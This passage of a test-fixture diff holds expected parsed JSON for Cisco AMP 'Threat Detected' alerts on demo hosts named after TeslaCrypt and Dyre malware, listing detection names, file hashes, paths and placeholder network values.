"host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 10592, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196247", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 256000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11917, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196246", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 13242, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196245", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 14567, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196244", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 209000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 15892, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196243", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17217, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196242", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 147000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 18542, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196241", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 19867, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196240", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 21191, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259080131182683", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 996000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259080131183000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 22515, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251507855228943", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 944000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 23834, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 8000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 25159, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261640", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 821000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26489, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261639", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27769, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261638", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 29385, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261637", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 680000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 30665, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + 